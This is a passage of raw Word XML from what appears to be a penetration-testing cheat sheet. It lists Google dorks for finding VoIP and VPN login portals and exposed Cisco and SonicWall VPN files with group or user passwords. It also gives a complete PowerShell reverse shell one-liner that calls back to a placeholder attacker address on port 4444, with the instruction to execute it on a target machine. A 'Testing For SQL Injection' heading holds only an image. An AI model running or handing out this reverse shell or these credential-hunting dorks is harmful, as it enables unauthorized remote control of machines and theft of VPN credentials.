        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:t>Pages containing login portals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785ECA05" w14:textId="5D86A6C5" w:rsidR="007F6E71" w:rsidRDefault="006B144B" w:rsidP="007F6E71">
      <w:r w:rsidRPr="006B144B">
        <w:t xml:space="preserve">inurl:/voice/advanced/ intitle:Linksys </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:t>SPA configuration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:t xml:space="preserve">Finds the Linksys VoIP router </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:t>configuration page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8ED889" w14:textId="3C1B24C7" w:rsidR="007F6E71" w:rsidRDefault="006B144B" w:rsidP="007F6E71">
      <w:r w:rsidRPr="006B144B">
        <w:t>intitle:"D-Link VoIP Router" "Welcome"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:t>Pages containing D-Link login portals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BDB0B7" w14:textId="6AE26D7A" w:rsidR="007F6E71" w:rsidRDefault="006B144B" w:rsidP="007F6E71">
      <w:r w:rsidRPr="006B144B">
        <w:t>intitle:asterisk.management.portal web-access</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:t>Looks for the Asterisk management portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB9889A" w14:textId="0169891C" w:rsidR="007F6E71" w:rsidRDefault="006B144B" w:rsidP="007F6E71">
      <w:r w:rsidRPr="006B144B">
        <w:t xml:space="preserve">intitle:"SPA504G Configuration" </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:t xml:space="preserve">Finds Cisco SPA504G Configuration Utility for IP </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:t>phones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EEBD73" w14:textId="77777777" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="007F6E71">
      <w:r>
        <w:t>intitle:“Sipura.SPA.Configuration” -.pdf</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Finds configuration pages for online VoIP devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279A6233" w14:textId="77777777" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="007F6E71">
      <w:r>
        <w:t>intitle:asterisk.management.portal web-access</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Finds the Asterisk web management portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CE2EB1" w14:textId="77777777" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="007F6E71">
      <w:r>
        <w:t>inurl:8080 intitle:“login” intext:“UserLogin” “English”</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>VoIP login portals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE74D80" w14:textId="769BEC89" w:rsidR="007F6E71" w:rsidRPr="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="007F6E71">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Google search queries for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VPN footprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D419644" w14:textId="73D811A4" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="00CF1724">
      <w:r w:rsidRPr="006B144B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Google Dork</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:cr/>
      </w:r>
      <w:r w:rsidRPr="007F6E71">
        <w:t>filetype:pcf "cisco" "GroupPwd"</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340" w:rsidRPr="00B85340">
        <w:t>Cisco VPN files with Group Passwords for remote access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F012AE" w14:textId="2B397A55" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="00CF1724">
      <w:r w:rsidRPr="007F6E71">
        <w:t>"[main]" "enc_GroupPwd=" ext:txt</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340" w:rsidRPr="00B85340">
        <w:t>Finds Cisco VPN client passwords (encrypted but easily cracked)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3476BC3E" w14:textId="56B02AA5" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="00CF1724">
      <w:r w:rsidRPr="007F6E71">
        <w:t>"Config" intitle:"Index of" intext:vpn</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
        <w:t>Directory with keys of VPN servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8A3BB5" w14:textId="74361711" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="00CF1724">
      <w:r w:rsidRPr="007F6E71">
        <w:t>inurl:/remote/login?lang=en</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
        <w:t>Finds FortiGate Firewalls’s SSL-VPN login portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8AC738" w14:textId="47E73159" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="00CF1724">
      <w:r w:rsidRPr="007F6E71">
        <w:t>!Host=*.* intext:enc_UserPassword=* ext:pcf</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
        <w:t>Looks for profile config files (.pcf) with user VPN profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB7A7D0" w14:textId="26AE1777" w:rsidR="00B85340" w:rsidRDefault="007F6E71" w:rsidP="00CF1724">
      <w:r w:rsidRPr="007F6E71">
        <w:t>filetype:rcf inurl:vpn</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:tab/>
        <w:t xml:space="preserve">Finds </w:t>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:t>SonicWall</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:t xml:space="preserve"> Global VPN client files</w:t>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:t xml:space="preserve"> containing sensitive info </w:t>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
        <w:t>and logins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10553406" w14:textId="7C54E5DC" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="00CF1724">
      <w:r w:rsidRPr="007F6E71">
        <w:t>filetype:pcf vpn OR Group</w:t>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
        <w:t>Finds publicly accessible .pcf used by VPN clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631E54A" w14:textId="0B1ECA5B" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="00CF1724">
      <w:r w:rsidRPr="007F6E71">
        <w:t>vpnssl</w:t>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
        <w:t>Retrieves login portals containing vpnssl companies’ access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C57B86" w14:textId="02AFAF0E" w:rsidR="007F6E71" w:rsidRDefault="007F6E71" w:rsidP="00CF1724">
      <w:r w:rsidRPr="007F6E71">
        <w:t>intitle:"SSL VPN Service" + intext:"Your system</w:t>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001A4EB5">
        <w:tab/>
        <w:t>Finds Cisco asa login web pages</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007F6E71">
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F6E71">
        <w:t>provided the following information</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007F6E71">
        <w:t>to help understand and</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F6E71">
        <w:t>remedy the security</w:t>
      </w:r>
      <w:r w:rsidR="00B85340">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007F6E71">
        <w:t>conditions:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DB68C8" w14:textId="044F7915" w:rsidR="000E2E12" w:rsidRDefault="000E2E12" w:rsidP="00CF1724"/>
    <w:p w14:paraId="77E4DC7D" w14:textId="21EB9AA7" w:rsidR="000E2E12" w:rsidRDefault="000E2E12">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F545855" w14:textId="2DA98808" w:rsidR="003F5A14" w:rsidRPr="003F5A14" w:rsidRDefault="003F5A14" w:rsidP="00CF1724">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5A14">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Scripts and Information: </w:t>
      </w:r>
      <w:r w:rsidR="003F50AF" w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse Shell Code (Windows executable)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003F5A14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Call back script to a netcat listener on YOUR.IP.ADD.RESS at port 4444.</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5A14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Simply execute this code on a target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698BA3A" w14:textId="44687476" w:rsidR="000E2E12" w:rsidRDefault="003F5A14" w:rsidP="00CF1724">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>$client</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>New</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>System.Net.Sockets.TCPClient("</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>YOUR.IP.ADD.RESS</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>",</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>);$stream</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>$client.GetStream();[byte[]]$bytes</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="009F4FE2" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>0..65535|%{0};while(($i</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>$stream.Read($bytes,</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>0,</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>$bytes.Length))</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>-ne</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>0){;$data</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>(New-Object</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>-TypeName</w:t>
      </w:r>
      <w:r w:rsidR="009F4FE2" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>System.Text.ASCIIEncoding).GetString($bytes,0,</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>$i);$sendback</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>(iex</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>$data</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>Out-String</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>);$sendback2</w:t>
      </w:r>
      <w:r w:rsidR="00E96D98" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>$sendback</w:t>
      </w:r>
      <w:r w:rsidR="00E96D98" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00E96D98" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>"#</w:t>
      </w:r>
      <w:r w:rsidR="00E96D98" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>";$sendbyte</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00AC6548" w:rsidRPr="003F5A14">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000E2E12" w:rsidRPr="003F5A14">
        <w:t>([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7648AA15" w14:textId="5CB1D1F3" w:rsidR="00C94969" w:rsidRDefault="00C94969">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F61C37" w14:textId="3301E055" w:rsidR="00C94969" w:rsidRDefault="00C94969" w:rsidP="00C94969">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Testing For SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDFD1E2" w14:textId="138A78F6" w:rsidR="00C94969" w:rsidRPr="003F5A14" w:rsidRDefault="00C94969" w:rsidP="00CF1724">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="424F258C" wp14:editId="71603DD4">
            <wp:extent cx="6718188" cy="3163929"/>
            <wp:effectExtent l="0" t="0" r="698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5"/>
                    <a:srcRect l="21803" t="30868" r="13658" b="17471"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6768087" cy="3187429"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C94969" w:rsidRPr="003F5A14" w:rsidSect="00EF6A12">
      <w:footerReference w:type="default" r:id="rId16"/>
      <w:pgSz w:w="11906" w:h="16838"/>
